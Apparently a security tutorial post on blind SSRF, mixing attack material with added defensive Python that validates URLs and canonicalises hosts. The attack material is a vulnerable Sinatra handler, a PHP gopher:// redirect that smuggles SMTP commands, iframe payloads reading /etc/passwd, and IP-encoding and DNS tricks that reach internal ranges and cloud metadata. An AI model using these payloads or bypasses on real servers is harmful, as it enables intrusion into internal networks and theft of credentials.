SSRF — Server Side Request Forgery (Types and ways to exploit it) Part-2

We discussed basic SSRF in Part 1; now we continue with blind SSRF.

ii. Blind -

require 'sinatra'
require 'open-uri'

# Vulnerable handler: fetches whatever URL the client supplies and throws
# the response away, so the caller never sees the body directly (hence
# "blind"); only timing, errors and side effects on the target remain.
get '/' do
  open params[:url]

  'done'
end
  • 127.0.0.1/32
  • 172.16.0.0/12
  • 192.168.0.0/16
<?php
// One SMTP command per element; joined with %0A they travel inside a single
// gopher:// URL, and the 302 hands that URL to whichever fetcher followed it.
$commands = array(
  'HELO test.org',
  'MAIL FROM: <admin@server.com>',
  'RCPT TO: <bit-bucket@test.smtp.org>',
  'DATA',
  'Test mail',
  '.'
);
$payload = implode('%0A', $commands);
header('Location: gopher://test.smtp.org:25/_'.$payload);
?>
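The handler above fetches any URL it is handed, and the PHP snippet shows why a 302 to a gopher:// URL lets such a fetch reach an SMTP port. The following is an added example, not code from the original post, of the policy a fetcher can enforce instead, written in Python: an http/https scheme allow-list, resolve-then-check against the loopback, RFC1918 and link-local ranges listed above, and manual redirect handling so every Location is re-validated. The host names and DNS answers in the fixture tables are constructed for offline use and are not real services.

```python
"""Hardened counterpart to the Sinatra `open params[:url]` handler above
(added example, not code from the original post). Rules: only http/https;
resolve the host first and refuse if ANY answer is loopback, RFC1918,
link-local (169.254.169.254 included) or otherwise not globally routable;
never let the HTTP client follow redirects itself, re-validate every Location
instead, which is what defeats the 302-to-gopher:// trick in the PHP snippet.
`resolver`/`transport` are injectable so it runs offline on the constructed
fixtures at the bottom (hypothetical hosts and answers)."""
import ipaddress
import socket
from typing import Callable, Dict, List, Optional, Tuple, Union
from urllib.parse import urljoin, urlsplit

IPAddr = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]
Resolver = Callable[[str], List[str]]
Transport = Callable[[str], Tuple[int, Dict[str, str], bytes]]
ALLOWED_SCHEMES = {"http", "https"}
MAX_REDIRECTS = 3
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "169.254.0.0/16", "0.0.0.0/8", "::1/128", "fc00::/7", "fe80::/10")]

def system_resolver(host: str) -> List[str]:
    """Real resolver: every A/AAAA answer, not only the first."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})

def blocked_reason(ip: IPAddr) -> Optional[str]:
    """Why this address may not be contacted, or None if it may."""
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
        ip = ip.ipv4_mapped                 # ::ffff:127.0.0.1 is judged as 127.0.0.1
    for net in BLOCKED_NETWORKS:
        if ip in net:
            return f"{ip} is inside blocked range {net}"
    return None if ip.is_global else f"{ip} is not globally routable"

def validate_url(url: str, resolver: Resolver = system_resolver) -> Tuple[bool, str]:
    """(allowed, reason); the reason is meant for the denial log."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if not parts.hostname:
        return False, "missing host"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL not allowed"
    try:
        answers = resolver(parts.hostname)
    except OSError as exc:                  # socket.gaierror is an OSError
        return False, f"resolution failed: {exc}"
    if not answers:
        return False, "host did not resolve"
    for addr in answers:                    # a single bad answer refuses the fetch
        reason = blocked_reason(ipaddress.ip_address(addr))
        if reason:
            return False, reason
    return True, "ok"

def fetch_with_policy(url: str, transport: Transport,
                      resolver: Resolver = system_resolver) -> Tuple[str, int, bytes]:
    """Fetch url, re-validating each redirect hop; ValueError on refusal."""
    current, hops = url, 0
    while True:
        ok, reason = validate_url(current, resolver)
        if not ok:
            raise ValueError(f"refused {current}: {reason}")
        status, headers, body = transport(current)
        location = headers.get("Location")
        if status in (301, 302, 303, 307, 308) and location:
            hops += 1
            if hops > MAX_REDIRECTS:
                raise ValueError("too many redirects")
            current = urljoin(current, location)   # relative Location resolved here
            continue
        return current, status, body

def fetch_or_reason(url: str, transport: Transport,
                    resolver: Resolver = system_resolver) -> Tuple[bool, str]:
    """(True, final_url) or (False, refusal reason)."""
    try:
        return True, fetch_with_policy(url, transport, resolver)[0]
    except ValueError as exc:
        return False, str(exc)

# --- constructed fixtures: hypothetical hosts, not real DNS or HTTP ---
FAKE_DNS: Dict[str, List[str]] = {
    "example.com": ["93.184.216.34"],                # constructed public answer
    "metadata.nicob.net": ["169.254.169.254"],       # as listed in section 3
    "10.0.0.1.xip.io": ["10.0.0.1"],
    "dual.example": ["93.184.216.34", "127.0.0.1"],  # one public and one loopback answer
}
FAKE_HTTP: Dict[str, Tuple[int, Dict[str, str], bytes]] = {
    "http://example.com/ok": (200, {}, b"hello"),
    "http://example.com/hop": (302, {"Location": "/ok"}, b""),
    "http://example.com/to-gopher": (302, {"Location": "gopher://test.smtp.org:25/_HELO"}, b""),
    "http://example.com/to-metadata": (302, {"Location": "http://metadata.nicob.net/"}, b""),
}

def fake_resolver(host: str) -> List[str]:
    try:
        return [str(ipaddress.ip_address(host))]    # IP literals resolve to themselves
    except ValueError:
        pass
    if host not in FAKE_DNS:
        raise socket.gaierror(-2, "Name or service not known")
    return FAKE_DNS[host]

fake_transport: Transport = FAKE_HTTP.__getitem__   # canned responses keyed by URL
```

Two points matter when wiring this into a real client. The check and the connect must not resolve the name independently: the answer can change between the two (DNS rebinding), so the client should connect to the address that passed validation and send the original Host header. And the reason strings are worth logging as-is; a run of refusals naming 169.254.169.254 or RFC1918 answers is a cheap detection signal for someone probing the fetcher.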

2. Test Cases -

Places to look for SSRF

POST /test/demo_form.php HTTP/1.1
Host: example.com

url=https://example.com/as&name2=value2
<iframe src="file:///etc/passwd" width="400" height="400">
<iframe src="file:///c:/windows/win.ini" width="400" height="400">
<input type="file" id="upload_file" name="upload_file[]" class="file" size="1" multiple="">
<input type="url" id="upload_file" name="upload_file[]" class="file" size="1" multiple="">

3. Bypass Whitelisting and Blacklisting -

Let's talk about whitelisting and blacklisting first.

http://0177.0.0.1/ = http://127.0.0.1
http://2130706433/ = http://127.0.0.1
http://3232235521/ = http://192.168.0.1
http://3232235777/ = http://192.168.1.1
10.0.0.1.xip.io resolves to 10.0.0.1
www.10.0.0.1.xip.io resolves to 10.0.0.1
mysite.10.0.0.1.xip.io resolves to 10.0.0.1
foo.bar.10.0.0.1.xip.io resolves to 10.0.0.1
ssrf-cloud.localdomain.pw resolves to 169.254.169.254
metadata.nicob.net resolves to 169.254.169.254
http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com

List:
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
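Every spelling listed above denotes the same address, and a filter that compares the host as text sees none of that. The following is an added example, not code from the original post, written in Python: numeric hosts are decoded the way inet_aton() does it (octal, decimal, hex, and short forms such as 127.1), Unicode hosts are folded with NFKC and IDNA so the circled-letter domain becomes example.com, and only the resolved addresses are judged. The resolver table is constructed to mirror the resolutions the post lists (xip.io and the two metadata names) so the check runs offline; the public answer for example.com is a placeholder.

```python
"""Canonicalising a URL's host before it is checked, so the spellings listed
in section 3 are judged by what they denote, not by their text (added
example, not code from the original post). Numeric hosts are decoded the way
inet_aton(3) does it: one to four dot-separated parts, each decimal, 0-prefixed
octal or 0x-prefixed hex, the last part filling the remaining bytes, so
0177.0.0.1, 2130706433 and 127.1 all become 127.0.0.1. Other hosts are
NFKC-folded and IDNA-encoded, then resolved through an injectable resolver;
the constructed table below mirrors the resolutions the post lists."""
import ipaddress
import re
import unicodedata
from typing import Callable, Dict, List, Optional, Union

IPAddr = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]
_PART = re.compile(r"^(0x[0-9a-f]+|0[0-7]*|[1-9][0-9]*)$", re.IGNORECASE)


def _part_value(p: str) -> int:
    if p.lower().startswith("0x"):
        return int(p[2:], 16)
    if len(p) > 1 and p.startswith("0"):
        return int(p, 8)
    return int(p, 10)


def inet_aton_like(host: str) -> Optional[ipaddress.IPv4Address]:
    """Decode host as inet_aton() would; None when it is not numeric."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or not all(_PART.match(p) for p in parts):
        return None
    values = [_part_value(p) for p in parts]
    *leading, last = values
    if any(v > 255 for v in leading) or last >= 256 ** (5 - len(values)):
        return None
    packed = 0
    for v in leading:
        packed = (packed << 8) | v
    packed = (packed << (8 * (5 - len(values)))) | last   # last part fills the rest
    return ipaddress.IPv4Address(packed)


def canonical_hostname(host: str) -> str:
    """NFKC fold (circled and fullwidth letters etc.), lowercase, drop trailing dot, IDNA."""
    folded = unicodedata.normalize("NFKC", host).lower().rstrip(".")
    return folded.encode("idna").decode("ascii")


def resolve_for_check(host: str, resolver: Callable[[str], List[str]]) -> List[IPAddr]:
    """Every address the host denotes; [] if it cannot be resolved (fail closed)."""
    numeric = inet_aton_like(host)
    if numeric is not None:
        return [numeric]
    try:
        return [ipaddress.ip_address(host)]        # plain dotted quad or IPv6 literal
    except ValueError:
        pass
    try:
        return [ipaddress.ip_address(a) for a in resolver(canonical_hostname(host))]
    except (OSError, UnicodeError, ValueError):
        return []


def is_internal(ip: IPAddr) -> bool:
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
        ip = ip.ipv4_mapped
    return not ip.is_global   # loopback, RFC1918, 169.254/16, reserved, ::1, fc00::/7


def host_is_safe(host: str, resolver: Callable[[str], List[str]]) -> bool:
    ips = resolve_for_check(host, resolver)
    return bool(ips) and not any(is_internal(ip) for ip in ips)


# constructed resolver table: hypothetical answers mirroring the post's list
FAKE_DNS: Dict[str, List[str]] = {
    "example.com": ["93.184.216.34"],            # placeholder public answer
    "10.0.0.1.xip.io": ["10.0.0.1"],
    "www.10.0.0.1.xip.io": ["10.0.0.1"],
    "foo.bar.10.0.0.1.xip.io": ["10.0.0.1"],
    "ssrf-cloud.localdomain.pw": ["169.254.169.254"],
    "metadata.nicob.net": ["169.254.169.254"],
}


def fake_resolver(name: str) -> List[str]:
    if name not in FAKE_DNS:
        raise OSError(f"NXDOMAIN {name}")
    return FAKE_DNS[name]
```

The order of the three steps is the point: numeric decoding comes before DNS because a resolver library will happily turn 2130706433 into 127.0.0.1 on its own, and NFKC comes before IDNA because the circled letters are compatibility characters that the encoder would otherwise reject or pass through untouched. A host that fails to resolve is treated as unsafe rather than skipped.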

🥵
